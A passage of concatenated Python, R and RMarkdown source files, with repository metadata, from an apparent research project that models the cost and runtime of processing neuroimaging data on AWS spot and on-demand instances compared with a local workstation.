'_sim.csv'\n stat_df = pd.DataFrame.from_csv(stat_csv)\n sim_df = pd.DataFrame.from_csv(sim_csv)\n\n # Extract params from filename\n fp_split = csv_pattern.split('-jobs')\n bid_ratio = float(fp_split[1][1:].split('-bid')[0])\n bid_price = bid_ratio*spot_history.mean()\n\n ### Download time fix ###\n # *Note the CPAC, ANTs, and Freesurfer csv outputs need this\n # CPAC pipeline params\n jobs_per = 3\n down_rate = 20\n out_gb_dl = 2.3\n down_gb_per_sec = down_rate/8.0/1024.0\n # Variables for download time fix\n num_ds = int(fp_split[0].split('/')[-1].split('_')[-1])\n num_nodes = min(np.ceil(float(num_ds)/jobs_per), 20)\n num_iter = np.ceil(num_ds/float((jobs_per*num_nodes)))\n num_jobs_n1 = ((num_iter-1)*num_nodes*jobs_per)\n res_xfer_out = (num_ds-num_jobs_n1)*(out_gb_dl/down_gb_per_sec)\n # Fix download time\n #stat_df['Download time'] += res_xfer_out/60.0 \n\n # Add to stat df\n len_df = len(stat_df)\n stat_df['Sim index'] = sim_df.index\n stat_df['Av zone'] = pd.Series([av_zone]*len_df, index=stat_df.index)\n stat_df['Bid ratio'] = pd.Series([bid_ratio]*len_df, index=stat_df.index)\n stat_df['Bid price'] = pd.Series([bid_price]*len_df, index=stat_df.index)\n stat_df['Num datasets'] = pd.Series([num_ds]*len_df, index=stat_df.index)\n stat_df['Start time'] = sim_df['Start time']\n stat_df['Interrupts'] = sim_df['Interrupts']\n stat_df['First Iter Time'] = sim_df['First Iter Time']\n\n # Add to dataframe list\n df_list.append(stat_df)\n\n # Status update\n print 'done making df list, now concat to big df...'\n big_df = pd.concat(df_list, ignore_index=True)\n\n # Write to disk as csv\n print 'Saving to disk...'\n big_df.to_csv('./%s.csv' % av_zone)\n print 'done writing!'\n\n # Return dataframe\n return big_df\n\n\n# Build list of processes to use in multi-proc\ndef build_proc_list(zones_basedir):\n '''\n Function to build a list of build_big_df processes from a directory\n of availability zones folders\n\n Parameters\n ----------\n zones_basedir : string\n base directory where the availability zone folders are residing\n\n Returns\n -------\n proc_list : list\n a list of multiprocessing.Process objects to run the\n build_big_df function\n '''\n\n # Import packages\n import glob\n import os\n import pandas as pd\n from multiprocessing import Process\n\n # Init variables\n av_zone_fp = os.path.join(zones_basedir, '*')\n av_zones_dirs = glob.glob(av_zone_fp)\n\n # Build big dictionary\n proc_list = [Process(target=build_big_df, args=(av_zone_dir,)) \\\n for av_zone_dir in av_zones_dirs]\n\n # Return the process list\n return proc_list\n\n\n# Convert spot history list to dataframe csv\ndef pklz_to_df(out_dir, pklz_file):\n '''\n Function to convert pklz list file to csv dataframe\n\n Parameters\n ----------\n out_dir : string\n filepath to the output base directory to store the dataframes\n pklz_file : string\n filepath to the .pklz file, which contains a list of\n boto spot price history objects\n\n Returns\n -------\n None\n this function saves the dataframe to a csv\n '''\n\n # Import packages\n import gzip\n import os\n import pandas as pd\n import pickle as pk\n import time\n\n # Init variables\n gfile = gzip.open(pklz_file)\n sh_list = pk.load(gfile)\n idx = 0\n\n # If the list is empty return nothing\n if len(sh_list) == 0:\n return\n\n # Init data frame\n df_cols = ['Timestamp', 'Price', 'Region', 'Availability zone',\n 'Product', 'Instance type']\n merged_df = pd.DataFrame(columns=df_cols)\n\n # Iterate through histories\n for sh in sh_list:\n timestamp = str(sh.timestamp)\n price = sh.price\n reg = str(sh.region).split(':')[-1]\n av_zone = str(sh.availability_zone)\n prod = str(sh.product_description)\n inst = str(sh.instance_type)\n df_entry = [timestamp, price, reg, av_zone, prod, inst]\n merged_df.loc[idx] = df_entry\n idx += 1\n print '%d/%d' % (idx, len(sh_list))\n\n # Write out merged dataframe\n out_csv = os.path.join(out_dir, reg, prod.replace('/', '-'), inst, str(time.time()) + '.csv')\n csv_dir = os.path.dirname(out_csv)\n\n # Check if folders exists\n if not os.path.exists(csv_dir):\n os.makedirs(csv_dir)\n\n print 'Done merging, writing out to %s...' % out_csv\n merged_df.to_csv(out_csv)\n\n\n# Run jobs in parallel\ndef run_in_parallel(proc_list, num_cores):\n '''\n Function to kick off a list of processes in parallel, guaranteeing\n that a fixed number of cores or less is running at all times\n\n Parameters\n ----------\n proc_list : list\n a list of multiprocessing.Process objects\n num_cores : integer\n the number of cores or processes to run at once\n\n Returns\n -------\n None\n there is no return value for this function\n '''\n\n # Import packages\n import time\n\n # Init variables\n idx = 0\n job_queue = []\n\n # While loop for when jobs are still running\n while idx < len(proc_list):\n if len(job_queue) == 0 and idx == 0:\n idc = idx\n for p in proc_list[idc:idc+num_cores]:\n p.start()\n job_queue.append(p)\n idx += 1\n else:\n for job in job_queue:\n if not job.is_alive():\n print 'found dead job', job\n loc = job_queue.index(job)\n del job_queue[loc]\n if idx < len(proc_list):\n proc_list[idx].start()\n else:\n break\n job_queue.append(proc_list[idx])\n idx += 1\n time.sleep(2)\n\n\n# Print status of file progression in loop\ndef print_loop_status(itr, full_len):\n '''\n Function to print the current percentage completed of a loop\n Parameters\n ----------\n itr : integer\n the current iteration of the loop\n full_len : integer\n the full length of the loop\n Returns\n -------\n None\n the function prints the loop status, but doesn't return a value\n '''\n\n # Print the percentage complete\n per = 100*(float(itr)/full_len)\n print '%d/%d\\n%f%% complete' % (itr, full_len, per)\n\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Grab az_zone folders base\n zones_basedir = str(sys.argv[1])\n\n # Call main\n proc_list = build_proc_list(zones_basedir)\n\n #build_big_df('~/Documents/projects/Clark2015_AWS/spot-model/out/us-east-1a')\n # Run in parallel\n run_in_parallel(proc_list, 6)\n" }, { "alpha_fraction": 0.5949280261993408, "alphanum_fraction": 0.602695882320404, "avg_line_length": 28.18000030517578, "blob_id": "453e77c734b8924bb962c8febdbe7d2a0ee4f2c7", "content_id": "b96bb3d63ecfef1b82a208a4316b9b926d596bee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4377, "license_type": "permissive", "max_line_length": 88, "num_lines": 150, "path": "/data-preproc/scripts/get_run_stats.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# get_run_stats.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module contains functions which interact with log files on S3 to\ngather runtime statistics\n'''\n\n# Get CPAC runtimes from log file\ndef get_cpac_runtimes(log_str):\n '''\n '''\n\n # Import packages\n import dateutil.parser\n import pytz\n\n # Init variables\n for log_line in log_str:\n if 'End - ' in log_line:\n end_line = log_line\n elif 'Elapsed run time' in log_line:\n cpac_time_line = log_line\n elif 'time of completion' in log_line:\n upl_start_line = log_line\n elif 'finished file' in log_line:\n num_files = int(log_line.split('/')[-1])\n elif 'detailed dot file' in log_line:\n subj_id = log_line.split(': ')[1].split('resting_preproc_')[1].split('/')[0]\n\n\n # Get CPAC runtime\n cpac_time = float(cpac_time_line.split(': ')[-1])\n\n # Get upload start time\n upl_start_time = upl_start_line.split(': ')[-1]\n upl_start_dt = dateutil.parser.parse(upl_start_time)\n upl_start_dt = pytz.utc.localize(upl_start_dt)\n\n # Get upload finish time\n upl_finish_time = end_line.split(' : ')[-1]\n upl_finish_dt = dateutil.parser.parse(upl_finish_time)\n\n # Get upload time\n upl_time = (upl_finish_dt - upl_start_dt).total_seconds()/60.0\n\n # Return variables\n return cpac_time, upl_time, num_files, subj_id\n\n\n# Get CPAC runtimes from SGE logs\ndef cpac_sge_logstats(s3_prefix, str_filt, creds_path, bucket_name):\n '''\n '''\n\n # Import packages\n from CPAC.AWS import fetch_creds, aws_utils\n import os\n import numpy as np\n import yaml\n\n # Init variables\n bucket = fetch_creds.return_bucket(creds_path, bucket_name)\n log_keys = []\n log_pass = {}\n log_fail = []\n\n # Get the log file keys\n print 'Finding log S3 keys...'\n for key in bucket.list(prefix=s3_prefix):\n if str_filt in str(key.name):\n log_keys.append(key)\n\n # Get only tasks that finished\n print 'Searching for complete CPAC runs and getting runtimes...'\n for idx, key in enumerate(log_keys):\n kname = str(key.name)\n # Get log contents as a string in memory\n log_str = key.get_contents_as_string()\n\n # If it passed cpac running without crashing\n if 'CPAC run complete' in log_str:\n cpac_pass = True\n else:\n cpac_pass = False\n\n # Split log strings into list\n log_str = log_str.split('\\n')\n\n # If it has 'End' at the end, it ran without crashing\n if 'End' in log_str[-2] and cpac_pass:\n # Get runtimes\n cpac_time, upl_time, num_files, subj = get_cpac_runtimes(log_str)\n log_pass[subj] = (cpac_time, upl_time, num_files)\n else:\n log_fail.append(kname)\n\n # Update status\n print '%.3f%% complete' % (100*(float(idx)/len(log_keys)))\n\n # Get stats\n num_subs_pass = len(log_pass)\n num_subs_fail = len(log_fail)\n\n cpac_times = {sub : times[0] for sub, times in log_pass.items()}\n cpac_mean = np.mean(cpac_times.values())\n\n upl_times = {sub : times[1] for sub, times in log_pass.items()}\n upl_mean = np.mean(upl_times.values())\n\n # Save times as yamls\n with open(os.path.join(os.getcwd(), 'cpac_times.yml'), 'w') as f:\n f.write(yaml.dump(cpac_times))\n with open(os.path.join(os.getcwd(), 'upl_times.yml'), 'w') as f:\n f.write(yaml.dump(upl_times))\n with open(os.path.join(os.getcwd(), 'fail_logs.yml'), 'w') as f:\n f.write(yaml.dump(log_fail))\n\n # Print report\n print 'Number of subjects passed: %d' % len(log_pass)\n print 'Number of subjects failed: %d' % len(log_fail)\n print 'Average CPAC run time: %.3f minutes' % cpac_mean\n print 'Average upload time: %.3f minutes' % upl_mean\n\n # Return variables\n return cpac_times, upl_times\n\n\n# Histogram of runtimes\ndef plot_runtimes_hist(times_dict, num_bins):\n '''\n '''\n\n # Import packages\n import matplotlib.pyplot as plt\n import numpy as np\n import os\n\n # Init variables\n times = times_dict.values()\n hist, bins = np.histogram(times, bins=num_bins)\n\n # Plot histogram\n width = 0.7 * (bins[1] - bins[0])\n center = (bins[:-1] + bins[1:]) / 2\n plt.bar(center, hist, align='center', width=width)\n\n # Save fig\n plt.savefig(os.path.join(os.getcwd(), 'histogram.png'))\n" }, { "alpha_fraction": 0.6454908847808838, "alphanum_fraction": 0.6632607579231262, "avg_line_length": 36.831932067871094, "blob_id": "55e1788ad64903cd4e17823c661cf44a1412c8e8", "content_id": "8044b1f0a288b02c8c8baa33397d91b478fa8f57", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 4502, "license_type": "permissive", "max_line_length": 178, "num_lines": 119, "path": "/spot-model/spot_sim_plots_sw.Rmd", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "---\ntitle: \"AWSome simulations\"\nauthor: \"cameron and danny\"\ndate: \"07/06/2015\"\noutput: html_document\n---\n\nResults for AWS simulations. Ideal plots are based on a static model in\nwhich the price does not fluctuate over time. Simulation results use \nhistorical spot price information to run monte-carlo simulations to \nestimate how long and how expensive the runs would be if they were\nrun at that point in time. Models are based on the execution of a few\ndifferent processing pipelines:\n\n1. The Configurable Pipeline for the Analysis of Connectomes (C-PAC) pipeline which performs basic structural processing along with functional-connectomics style fMRI processing.\n2. The freesurfer pipeline for extracting cortical thickness and other indices of anatomy from structural MRI data.\n\nThe pipelines are executed on a SGE style cluster with a single master node and up to 20 compute \"worker\" nodes. The master node is a t2.small\non-demand instance with local data storage to support the execution of \nall other nodes. \n\n```{r}\nlibrary(ggplot2)\nlibrary(reshape)\nlibrary(plyr)\n\nif( ! file.exists(\"cpac_df_agg.csv\")){\n cpac_df = read.csv(\"cpac_df.csv\")\n\n summary(cpac_df)\n\n # Mean statistics by av_zone, num_datasets, and bid_ratio\n cpac_df_agg<-ddply(cpac_df,.(Av.zone,Num.datasets,Bid.ratio),\n summarize,\n mean_total_cost=median(Total.cost),\n mean_instance_cost=median(Instance.cost),\n mean_storage_cost=median(Storage.cost),\n mean_xfer_cost=median(Tranfer.cost),\n mean_total_time=median(Total.time),\n mean_run_time=median(Run.time),\n mean_wait_time=median(Wait.time),\n mean_upl_time=median(Upload.time),\n mean_dl_time=median(Download.time),\n mean_interrupts=median(Interrupts))\n\n\n # remove the full df\n rm(cpac_df)\n\n cpac_df_agg$Region[grep(\"us-west\",cpac_df_agg$Av.zone)]=\"US West\"\n cpac_df_agg$Region[grep(\"us-east\",cpac_df_agg$Av.zone)]=\"US East\"\n cpac_df_agg$Region[grep(\"ap\",cpac_df_agg$Av.zone)]=\"Asia Pacific\"\n cpac_df_agg$Region[grep(\"eu\",cpac_df_agg$Av.zone)]=\"Europe\"\n cpac_df_agg$Region[grep(\"sa\",cpac_df_agg$Av.zone)]=\"South America\"\n cpac_df_agg$Region=factor(cpac_df_agg$Region)\n #cpac_df_agg=subset(cpac_df_agg,Num.datasets<=10000)\n cpac_df_agg=subset(cpac_df_agg,Num.datasets < 3000)\n write.csv(cpac_df_agg,file=\"cpac_df_agg.csv\")\n} else {\n cpac_df_agg=read.csv(\"cpac_df_agg.csv\")\n cpac_df_agg=subset(cpac_df_agg,Num.datasets < 3000)\n}\n\n\n```\n\nYou can also embed plots, for example:\n\n```{r plots, fig.width=8, fig.height=12}\nlibrary(gridExtra)\n\np1<-ggplot(subset(cpac_df_agg,Num.datasets==1000), \n aes(x=Bid.ratio,y=mean_total_cost,col=Av.zone))+\n geom_line()+\n facet_grid(Region~.,scales=\"free_y\")+\n theme_bw()+\n theme(legend.position=\"None\",\n axis.title.x = element_text(size=10,colour=\"black\", vjust=-.8),\n axis.title.y = element_text(size=10,colour=\"black\"),\n axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n axis.text.y = element_text(size=8,colour=\"black\"))\n\n\np2<-ggplot(subset(cpac_df_agg,Num.datasets==1000), \n aes(x=Bid.ratio,y=mean_total_time/3600,col=Av.zone))+\n geom_line()+\n facet_grid(Region~.,scales=\"free_y\")+\n theme(legend.position=\"None\")\n\np3<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n aes(x=Num.datasets,y=mean_total_cost,col=Av.zone))+\n geom_line()+\n facet_grid(Region~.,scales=\"free_y\")+\n theme(legend.position=\"None\")\n\np4<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n aes(x=Num.datasets,y=mean_total_time/3600,col=Av.zone))+\n geom_line()+\n facet_grid(Region~.,scales=\"free_y\")+\n theme(legend.position=\"None\")\n\np5<-ggplot(subset(cpac_df_agg,Bid.ratio==2.5), \n aes(x=Num.datasets,y=mean_interrupts,col=Av.zone))+\n geom_line()+\n facet_grid(Region~.,scales=\"free_y\")+\n theme(legend.position=\"None\")\n\ngrid.newpage()\nlayout=grid.layout(2,2)\npushViewport(viewport(layout=layout))\n\nprint(p1,vp=viewport(layout.pos.row=1, layout.pos.col=1))\nprint(p2,vp=viewport(layout.pos.row=2, layout.pos.col=1))\nprint(p3,vp=viewport(layout.pos.row=1, layout.pos.col=2))\nprint(p4,vp=viewport(layout.pos.row=2, layout.pos.col=2))\n```\n\n\nNote that the `echo = FALSE` parameter was added to the code chunk to prevent printing of the R code that generated the plot.\n" }, { "alpha_fraction": 0.6073130369186401, "alphanum_fraction": 0.6353868842124939, "avg_line_length": 32.94411849975586, "blob_id": "b7ea5bad57f99febbbac645e60beb5d7423d0833", "content_id": "f2d59707dbc4af4024bb6e20aee59e16d41badbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 11541, "license_type": "permissive", "max_line_length": 117, "num_lines": 340, "path": "/spot-model/S3_costs_2mm.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "library(ggplot2)\nlibrary(plyr)\nlibrary(reshape)\nlibrary(grid)\n\n# Multiple plot function\n#\n# ggplot objects can be passed in ..., or to plotlist (as a list of ggplot objects)\n# - cols: Number of columns in layout\n# - layout: A matrix specifying the layout. If present, 'cols' is ignored.\n#\n# If the layout is something like matrix(c(1,2,3,3), nrow=2, byrow=TRUE),\n# then plot 1 will go in the upper left, 2 will go in the upper right, and\n# 3 will go all the way across the bottom.\n#\nmultiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL) {\n require(grid)\n \n # Make a list from the ... arguments and plotlist\n plots <- c(list(...), plotlist)\n \n numPlots = length(plots)\n \n # If layout is NULL, then use 'cols' to determine layout\n if (is.null(layout)) {\n # Make the panel\n # ncol: Number of columns of plots\n # nrow: Number of rows needed, calculated from # of cols\n layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),\n ncol = cols, nrow = ceiling(numPlots/cols))\n }\n \n if (numPlots==1) {\n print(plots[[1]])\n \n } else {\n # Set up the page\n grid.newpage()\n pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))\n \n # Make each plot, in the correct location\n for (i in 1:numPlots) {\n # Get the i,j matrix positions of the regions that contain this subplot\n matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))\n \n print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,\n layout.pos.col = matchidx$col))\n }\n }\n}\n\ncalc_costs_aws_2spot <- function(x){\n num_datasets <- x\n num_months = 48\n\n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n\n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 2*0.26\n\n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n\n\n #xfers\n xfer_cost_BG <- 0.09\n\n\n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n\n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n\n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n\n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\ncalc_costs_aws_spot <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 0.26\n \n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n \n \n #xfers\n xfer_cost_BG <- 0.09\n \n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n \n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\n\ncalc_costs_aws_ondemand <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 1.6\n \n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n \n \n #xfers\n xfer_cost_BG <- 0.09\n \n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n \n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\ncalc_time_aws <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n return(num_hours)\n}\n\ncalc_time_cap <- function(x){\n num_datasets <- x\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- 1\n \n # calculate the number of hours\n num_iters <- max(ceiling(num_datasets / (datasets_instance * num_instances)),1)\n num_hours <- ceiling(hours_dataset * num_iters)\n \n return(num_hours)\n}\n\ncalc_costs_cap <- function(x){\n num_datasets <- x\n \n workstation <- 8642\n \n salary <- .05 * 50000 * 1.25\n \n power_supply_kw <- .9*1100/1000\n power_kw <- .1055\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- 1\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n total_cost = workstation + salary + num_hours * power_supply_kw * power_kw\n \n return(total_cost)\n}\n\n\nsalary <- .05 * 50000 * 1.25\nworkstation <- 8642\npower_cost_h <- .1055 * 1100/1000 *.9\n\ncap_costs <- salary + workstation\ncosts_compare<-data.frame(num_datasets=seq(0,6000,1))\ncosts_compare$op_costs_2spot<-apply(costs_compare[1],1,calc_costs_aws_2spot)\ncosts_compare$op_costs_spot<-apply(costs_compare[1],1,calc_costs_aws_spot)\ncosts_compare$op_costs_ondemand<-apply(costs_compare[1],1,calc_costs_aws_ondemand)\ncosts_compare$cap_costs<-apply(costs_compare[1],1,calc_costs_cap)\ncosts_compare$workstation<-apply(costs_compare[1],1,function(x) workstation)\ncosts_compare$salary<-apply(costs_compare[1],1,function(x) salary)\ncosts_compare$electricity<-apply(costs_compare[1],1,function(x) calc_time_cap(x)*power_cost_h)\ncosts_compare$salary_electricity<-apply(costs_compare[1],1,function(x) calc_time_cap(x)*power_cost_h+salary)\ncosts_compare_m=melt(costs_compare,id=\"num_datasets\")\ncosts_compare_m$variable=revalue(costs_compare_m$variable,c(\"op_costs_2spot\"=\"AWS Spot 2X\",\n \"op_costs_spot\"=\"AWS Spot\",\n \"op_costs_ondemand\"=\"AWS On Demand\",\n \"cap_costs\"=\"Workstation, Maintenance,\\nand Electricity\",\n \"workstation\"=\"Workstation\",\n \"salary\"=\"Maintenance\",\n \"electricity\"=\"Electricity\",\n \"salary_electricity\"=\"Maintenance and\\nElectricity\"))\n\ntime_compare<-data.frame(num_datasets=seq(0,6000,1))\ntime_compare$cap_time<-apply(costs_compare[1],1,calc_time_cap)\ntime_compare$op_time<-apply(costs_compare[1],1,calc_time_aws)\ntime_compare_m=melt(time_compare,id=\"num_datasets\")\ntime_compare_m$variable=revalue(time_compare_m$variable,c(\"cap_time\"=\"Local Execution Time\",\n \"op_time\"=\"AWS Execution Time\"))\np1<-ggplot(costs_compare_m)+\n geom_line(aes(num_datasets,value,color=variable))+\n scale_y_continuous(breaks = round(seq(min(costs_compare_m$value), max(costs_compare_m$value), by = 2500),1))+\n xlab(\"Number of Datasets\")+\n ylab(\"Cost ($)\")+\n guides(col = guide_legend(ncol = 2, byrow = FALSE))+\n theme_bw()+\n theme(axis.title.x = element_text(size=6,colour=\"black\"),\n axis.title.y = element_text(size=6,colour=\"black\"),\n axis.text.x = element_text(size=6,colour=\"black\"),\n axis.text.y = element_text(size=6,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.margin=unit(.1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(2,\"mm\"),\n panel.margin=unit(0,\"mm\"),\n legend.text = element_text(size=6))\n\ncost_at_1000=costs_compare_m[costs_compare_m$num_datasets==1000,]\n#cost_at_1000=apply(cost_at_1000[1],1,function(x) x/1000)\n\ntime_at_1000=time_compare_m[time_compare_m$num_datasets==1000,]\n#geom_text(aes(x=1000,y=time_at_1000$value,label = round(time_at_1000$value,0),size=11,family=\"Arial\",vjust=-.5))+\np2<-ggplot(time_compare_m)+geom_line(aes(num_datasets,value,color=variable))+\n xlab(\"Number of Datasets\")+\n ylab(\"Number of Hours\")+\n guides(col = guide_legend(ncol = 2, byrow = TRUE))+\n theme_bw()+\n theme(axis.title.x = element_text(size=6,colour=\"black\"),\n axis.title.y = element_text(size=6,colour=\"black\"),\n axis.text.x = element_text(size=6,colour=\"black\"),\n axis.text.y = element_text(size=6,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.margin=unit(.1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(2,\"mm\"),\n panel.margin=unit(0,\"mm\"),\n legend.text = element_text(size=6))\n\np3<-ggplot(cost_at_1000,aes(x=reorder(variable,value,function(x) x),y=value,fill=variable))+\n geom_bar(stat = \"identity\")+\n geom_text(aes(label=round(value,0),vjust=-.5,size=4))+\n xlab(\"Approach\")+\n ylab(\"Cost for 1000 datasets ($)\")+\n theme_bw()+\n theme(axis.title.x = element_text(size=11,colour=\"black\"),\n axis.title.y = element_text(size=11,colour=\"black\"),\n axis.text.x = element_text(size=11,angle=35,hjust=1,colour=\"black\"),\n axis.text.y = element_text(size=11,colour=\"black\"),\n legend.position=\"\",\n legend.title=element_blank(),\n legend.text = element_text(size=11))\n#costs_compare$cap_costs<-apply(costs_compare,1,function (x) cap_costs)\n\n#\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_1.pdf\", width=2.8, height = 3)\nprint(p1)\ndev.off()\n\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_2.pdf\", width=2.8, height = 3)\nprint(p2)\ndev.off()\n\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_3.pdf\", width=6, height = 6)\nprint(p3)\ndev.off()\n" }, { "alpha_fraction": 0.6134421229362488, "alphanum_fraction": 0.6352376341819763, "avg_line_length": 36.59927749633789, "blob_id": "60197723b780cfda147ffb612c07d9e23bd85fd3", "content_id": "99e95d849a131d2c1f3361364709b96c61af2d7c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 10415, "license_type": "permissive", "max_line_length": 114, "num_lines": 277, "path": "/spot-model/spot_sim_plots.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/spot_sim_plots.R\n#\n# Author: Daniel Clark, 2015\n\n# Import packages\nlibrary(ggplot2)\nlibrary(plyr)\nlibrary(reshape2)\nlibrary(grid)\n\n# Init variables\ncpac_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/cpac_df.csv'\nants_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/ants_df.csv'\nfs_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/fs_df.csv'\n\n# Sim plots fixed variables\nbid_ratio <- 2.5\nnum_datasets <- 1000\n\n# Simulation plots\nsim_plots <- function(csv, bid_ratio, num_datasets){\n # Read in dataframe\n df <- read.csv(csv)\n\n # Get fixed bid ratio data frame for plotting\n fixed_bid_df <- subset(df, Bid.ratio == bid_ratio)\n\n # Get fixed dataset size frame for plotting\n fixed_ds_df <- subset(df, Num.datasets == num_datasets)\n\n # Get mean total cost and total time dataframes for fixed bid ratio\n mean_total_cost_df <- ddply(fixed_bid_df, .(Av.zone, Num.datasets), summarize, mean_cost=mean(Total.cost))\n mean_total_time_df <- ddply(fixed_bid_df, .(Av.zone, Num.datasets), summarize, mean_time=mean(Total.time))\n\n # Plot total cost vs. num of datasets\n p0 <- ggplot(mean_total_cost_df, aes(x=Num.datasets, y=mean_cost, colour=Av.zone)) + geom_line()\n p1 <- ggplot(mean_total_time_df, aes(x=Num.datasets, y=mean_time, colour=Av.zone)) + geom_line()\n\n # Get mean total cost and total time dataframes for fixed num datasets\n mean_total_cost_df <- ddply(fixed_ds_df, .(Av.zone, Bid.ratio), summarize, mean_cost=mean(Total.cost))\n mean_total_time_df <- ddply(fixed_ds_df, .(Av.zone, Bid.ratio), summarize, mean_time=mean(Total.time))\n\n # Plot total cost vs. num of datasets\n p2 <- 